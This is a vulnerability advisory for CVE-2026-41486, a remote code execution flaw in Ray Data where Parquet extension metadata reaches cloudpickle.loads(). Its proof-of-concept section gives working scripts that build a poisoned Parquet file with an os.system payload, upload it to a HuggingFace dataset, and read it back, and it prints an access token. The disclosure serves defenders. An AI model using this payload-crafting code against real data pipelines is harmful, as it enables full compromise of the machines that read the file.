CVE-2026-41486

GHSA-mw35-8rx3-xf9r HIGH
Published April 24, 2026

# Remote Code Execution via Parquet Arrow Extension Type Deserialization

## Summary

Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes, and Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read.


Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---------|-----------|------------------|---------|
| ray | pip | >= 2.49.0, < 2.55.0 | 2.55.0 |

If you use ray in the vulnerable range (>= 2.49.0, < 2.55.0), you're affected.
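A quick way to tell whether an installed environment falls in the vulnerable range is a version comparison against the advisory's bounds. The sketch below is illustrative (the helper names are not part of Ray) and assumes plain `X.Y.Z` version strings; pre-release suffixes would need a real version parser such as `packaging.version`.

```python
from importlib.metadata import PackageNotFoundError, version

# Bounds from the advisory: >= 2.49.0, < 2.55.0 (patched in 2.55.0).
VULN_MIN = (2, 49, 0)
PATCHED = (2, 55, 0)

def parse(v: str) -> tuple:
    # Assumes a plain "X.Y.Z" string; no pre-release/dev suffix handling.
    return tuple(int(p) for p in v.split(".")[:3])

def is_vulnerable(v: str) -> bool:
    return VULN_MIN <= parse(v) < PATCHED

try:
    installed = version("ray")
    print(installed, "VULNERABLE" if is_vulnerable(installed) else "ok")
except PackageNotFoundError:
    print("ray is not installed")
```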

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

Recommended Action

Patch available

Update ray to version 2.55.0

Compliance Impact

Compliance analysis pending.

Frequently Asked Questions

What is CVE-2026-41486?

CVE-2026-41486 is a remote code execution vulnerability in Ray Data's Parquet Arrow extension type deserialization: crafted extension metadata in a Parquet file is passed to `cloudpickle.loads()` during schema parsing, executing arbitrary code before any row data is read.

Is CVE-2026-41486 actively exploited?

No confirmed active exploitation of CVE-2026-41486 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-41486?

Update to patched version: ray 2.55.0.

What is the CVSS score for CVE-2026-41486?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Remote Code Execution via Parquet Arrow Extension Type Deserialization

## Summary

Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read.

In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://github.com/ray-project/ray/issues/41314), [PR #45084](https://github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://github.com/ray-project/ray/pull/54831) introduced `cloudpickle.loads()` into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.

Note: Source links in this report are pinned to the Ray 2.54.0 release commit (`48bd1f8fa4`) for stable line references. We also re-verified the same vulnerable code paths on current `master` as of March 17, 2026.

## Details

### Extension type registration

Ray Data registers three Arrow extension types globally in PyArrow:

```python
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))
```

Registration happens at module load time ([`__init__.py:94-95`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)), and any use of `ray.data` triggers it. Once registered, PyArrow automatically calls `__arrow_ext_deserialize__` whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
### The code path to `cloudpickle.loads()`

All three extension types inherit from `ArrowExtensionSerializeDeserializeCache`, whose `__arrow_ext_deserialize__` method ([`arrow.py:176-179`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179)) delegates to subclass methods that ultimately call `_deserialize_with_fallback()`:

```python
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )
```

The `serialized` bytes come directly from the Parquet file's field-level metadata (`ARROW:extension:metadata`) with no validation. `cloudpickle.loads()` is tried **first**, meaning a crafted payload will always be executed before the safe JSON fallback is reached.

For `ArrowTensorType`, the call chain is:

```
__arrow_ext_deserialize__(cls, storage_type, serialized)    # arrow.py:176
  -> _arrow_ext_deserialize_cache(serialized, value_type)   # arrow.py:178
  -> _arrow_ext_deserialize_compute(serialized, value_type) # arrow.py:652
  -> _deserialize_with_fallback(serialized, "shape")        # arrow.py:653
  -> cloudpickle.loads(serialized)                          # arrow.py:88  RCE
```

`ArrowTensorTypeV2` ([`arrow.py:679-680`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680)) and `ArrowVariableShapedTensorType` ([`arrow.py:1076-1077`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077)) follow the same pattern.
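The danger of the pickle-before-JSON ordering can be reproduced with the standard library alone. The sketch below is illustrative, not Ray's code: it uses `pickle` as a stand-in for `cloudpickle` (equivalent for this purpose), a hypothetical proof file path, and a benign `open()` call where a real attacker would invoke `os.system`.

```python
import json
import os
import pickle
import tempfile

# Hypothetical proof-of-execution file (illustrative, not from the advisory).
PROOF = os.path.join(tempfile.gettempdir(), "pickle-first-fallback-demo")
if os.path.exists(PROOF):
    os.remove(PROOF)

class Trigger:
    """Crafted payload: pickle.loads() calls the callable returned by __reduce__."""
    def __reduce__(self):
        # Benign stand-in side effect; an attacker would call os.system instead.
        return (open, (PROOF, "w"))

def deserialize_with_fallback(serialized: bytes):
    # Mirrors the vulnerable ordering: pickle is tried first, so a crafted
    # payload executes before the safe JSON branch is ever reached.
    try:
        return pickle.loads(serialized)
    except Exception:
        return json.loads(serialized)

deserialize_with_fallback(pickle.dumps(Trigger()))
print(os.path.exists(PROOF))  # True: the side effect ran during deserialization
```

The point of the demo is that the attacker controls the serialized bytes end to end, so the "fallback" never acts as a guard: any payload that unpickles successfully short-circuits the JSON path.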
### Why the existing mitigation doesn't help

After issue [#41314](https://github.com/ray-project/ray/issues/41314), Ray added `check_for_legacy_tensor_type()` in [`parquet_datasource.py:146-170`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170) to block the old `PyExtensionType`-based tensor types:

```python
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables.
    Previously, the extension type extended `PyExtensionType`. However, this
    base type can expose users to arbitrary code execution. To prevent this,
    we don't load the type by default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)
```

This guard checks for `PyExtensionType` / `UnknownExtensionType`. It does **not** check for the currently-registered `ray.data.arrow_tensor` types, which are the ones that call `cloudpickle.loads()`. Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.

### Outside Ray's documented threat model

Ray's [security documentation](https://docs.ray.io/en/latest/ray-security/index.html) states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.

## Impact

- **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable `_deserialize_with_fallback` function with `cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR #54831](https://github.com/ray-project/ray/pull/54831), July 2025), first released in Ray 2.49.0.
- **Affected configurations**: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including `ray.data.read_parquet()`, `pyarrow.parquet.read_table()`, `pandas.read_parquet()`, etc.
- **Attacker prerequisites**: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a `ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
- **CIA impact**: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- **Severity**: Critical

### Attack scenarios

1. **HuggingFace datasets**: Ray's documentation [recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face) reading Parquet datasets from HuggingFace using `ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`. Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with `ray.data.arrow_tensor` metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
2. **Multi-tenant ML platforms**: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
3. **Compromised data pipelines**: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.

## PoC

We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.

**Prerequisites:** Python 3.12+ and [uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl -LsSf https://astral.sh/uv/install.sh | sh`).

### PoC 1: Local file

Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.

**1. Create the Parquet file:**

```bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT

uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
```

**2. Read it with Ray Data:**

```bash
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution
```

### PoC 2: End-to-end via HuggingFace

This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's own documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face).
We uploaded a crafted Parquet file to a private HuggingFace dataset at [`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure). The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.

**Upload script** (for reference, this is how we seeded the dataset):

```bash
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path

import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi

def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))

repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id,
        repo_type="dataset",
    )
    print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT

# We ran:
#   uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'
```

**Reproduce** (reads the dataset from HuggingFace, no local files needed):

```bash
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
    'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
    filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution via HuggingFace dataset
```

The token above is read-only. The dataset is private to prevent unintended exposure.

## Suggested fix

The extension metadata stores simple values (a shape tuple like `(3, 224, 224)` or an ndim integer). These do not require cloudpickle.

1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()` with `json.loads()`.** The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate `cloudpickle.loads()` behind an opt-in environment variable (following the pattern already established with `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`).
2. **Serialize new extension type metadata as JSON by default.** `json.dumps([3, 224, 224])` carries the same information as `cloudpickle.dumps((3, 224, 224))`, without the code execution risk.
3. **Add a security note to `read_parquet()` documentation** explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.

Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.
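A minimal sketch of fix (1), inverting the fallback order so JSON is the default and unpickling requires an explicit opt-in. The environment variable name here is hypothetical (modeled on the existing `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE` pattern), and `pickle` again stands in for `cloudpickle`:

```python
import json
import os
import pickle  # stands in for cloudpickle in this sketch

# Hypothetical opt-in flag, modeled on RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE.
ALLOW_PICKLED_METADATA = (
    os.environ.get("RAY_DATA_ALLOW_PICKLED_TENSOR_METADATA") == "1"
)

def safe_deserialize(serialized: bytes, field_name: str = "data"):
    """JSON by default; unpickle only behind an explicit opt-in for legacy files."""
    try:
        return json.loads(serialized)
    except (json.JSONDecodeError, UnicodeDecodeError):
        if ALLOW_PICKLED_METADATA:
            # Legacy cloudpickle-format files from trusted sources only.
            return pickle.loads(serialized)
        raise ValueError(
            f"Refusing to unpickle {field_name}: metadata is not JSON and "
            "pickled metadata is disabled by default"
        )

# A shape round-trips through JSON with no code execution risk:
print(safe_deserialize(json.dumps([3, 224, 224]).encode()))  # [3, 224, 224]
```

With the order inverted, a crafted pickle payload is rejected by default instead of executed, and well-formed JSON metadata is never touched by the pickle path at all.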

Timeline

Published
April 24, 2026
Last Modified
April 24, 2026
First Seen
April 24, 2026
